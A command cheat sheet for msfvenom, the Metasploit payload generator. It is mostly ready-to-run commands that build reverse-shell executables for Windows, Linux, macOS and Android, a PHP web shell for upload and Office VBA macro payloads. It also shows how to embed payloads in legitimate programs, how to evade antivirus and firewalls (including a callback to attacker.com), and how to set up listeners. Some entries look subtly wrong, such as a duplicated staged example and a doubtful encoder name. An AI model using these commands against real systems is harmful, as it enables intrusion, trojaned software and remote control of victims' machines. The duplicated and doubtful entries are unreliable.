Msfvenom
Msfvenom is the payload generator and encoder from the Metasploit Framework. Create custom shellcode, executables, and encoded payloads for target systems.
Installation
Included with Metasploit
# Install Metasploit Framework
sudo apt install metasploit-framework
# Or build from source
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
./msfvenom
# Verify
msfvenom --version
msfvenom -l payloads | headWindows Installation
# Download Metasploit
# https://www.metasploit.com/download
# Use from Windows terminal
msfvenom --helpBasic Syntax
msfvenom -p <payload> -f <format> [OPTIONS]
# List all payloads
msfvenom -l payloads
# List formats
msfvenom -l formats
# List encoders
msfvenom -l encoders
# Show payload options
msfvenom -p windows/meterpreter/reverse_tcp --list-optionsCommon Payloads
Windows Payloads
# Reverse shell (TCP)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
# Bind shell
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe
# Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f exe -o shell.exe
# Staged payload (smaller)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
# Non-staged payload (complete shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exeLinux Payloads
# Reverse shell (x86)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell
# Reverse shell (x64)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell
# Bind shell
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o shell
# Chmod execute
chmod +x shell
./shellMacOS Payloads
# Reverse shell (Intel)
msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o shell
# Meterpreter
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o shellScript Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.php
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.py
# Ruby reverse shell
msfvenom -p ruby/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.rb
# Perl reverse shell
msfvenom -p perl/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.pl
# Bash reverse shell
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.shOutput Formats
| Format | Extension | Use Case |
|---|---|---|
exe | .exe | Windows executable |
elf | .elf | Linux binary |
macho | .macho | MacOS binary |
apk | .apk | Android application |
asp | .asp | Active Server Pages |
aspx | .aspx | ASP.NET |
war | .war | Java Web App |
jar | .jar | Java Archive |
raw | .bin | Raw shellcode |
c | .c | C source code |
python | .py | Python code |
bash | .sh | Bash script |
perl | .pl | Perl script |
ruby | .rb | Ruby script |
php | .php | PHP code |
hex | .txt | Hexadecimal |
vba | .vba | VBA macro |
Encoding & Obfuscation
Basic Encoding
# Encode payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-e x86/shikata_ga_nai -f exe -o shell.exe
# Multiple encode passes
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 -f exe -o shell.exe
# Different encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-e x86/jmp_call_additive -f exe -o shell.exeEncoder Options
# List available encoders
msfvenom -l encoders
# Show encoder options
msfvenom --list-options -e x86/shikata_ga_nai
# Custom encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-e x86/polymorphic_engine -i 10 -f exe -o shell.exeAdvanced Techniques
Staging vs Non-Staging
# Staged (two-stage, smaller filesize)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
# Non-staged (complete payload, larger)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
# Check size difference
ls -lh shell*.exeCustom Options
# List payload options
msfvenom -p windows/meterpreter/reverse_tcp --list-options
# Set custom options
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
DisablePayloadHandler=true \
-f exe -o shell.exeTemplate Injection
# Use existing EXE as template (stealth)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-f exe -x /path/to/legitimate.exe -o shell.exe
# Keep template properties
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
-f exe -x calculator.exe -k -o shell.exePractical Examples
Windows Reverse Shell
# Create payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-e x86/shikata_ga_nai \
-i 3 \
-f exe \
-o payload.exe
# Create handler in Metasploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
runLinux Payload with Encoder
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-e x86/shikata_ga_nai \
-i 5 \
-f elf \
-o payload
# Make executable
chmod +x payload
# Run payload
./payloadPHP Web Shell
# Create PHP payload
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f raw -o shell.php
# Upload to web server
# Then access via browser to trigger
# Setup handler
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
runWord/Office Macros
# Create VBA macro payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f vba -o payload.vba
# Manually insert into Office document
# Use tools like Macro-Pack for automated insertionAndroid APK
# Create APK payload
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-o payload.apk
# Sign APK (optional)
# jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 \
# -keystore my-release-key.keystore payload.apk my-key-aliasShellcode Generation
Raw Shellcode
# Generate raw shellcode
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f raw -o shellcode.bin
# Convert to hex
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f hex -o shellcode.hex
# Convert to C array
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f c -o shellcode.cBad Characters
# Generate avoiding bad characters (null bytes, etc)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-b '\x00\x0a\x0d' \
-f raw -o shellcode.binHandlers for Payloads
Multi-Handler Setup
# In Metasploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
set DisablePayloadHandler false
runHandle Multiple Connections
# Accept multiple connections
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -jTroubleshooting
Antivirus Evasion
# Use polymorphic encoder
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-e x86/shikata_ga_nai \
-i 10 \
-f exe -o payload.exe
# Use template injection
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.10 \
LPORT=4444 \
-f exe -x notepad.exe -k -o payload.exeFirewall Evasion
# Use HTTPS instead of HTTP
msfvenom -p windows/meterpreter/reverse_https \
LHOST=192.168.1.10 \
LPORT=443 \
-f exe -o payload.exe
# Use DNS resolution
msfvenom -p windows/meterpreter/reverse_dns_tcp \
LHOST=attacker.com \
LPORT=53 \
-f exe -o payload.exeSecurity Notes
- Only generate payloads for authorized testing
- Test payloads in isolated environments
- Document all payload generation
- Clean up payloads after testing
- Comply with laws and regulations
- Implement proper operational security (OPSEC)
- Use appropriate encryption for payload delivery
Last updated: 2025-03-30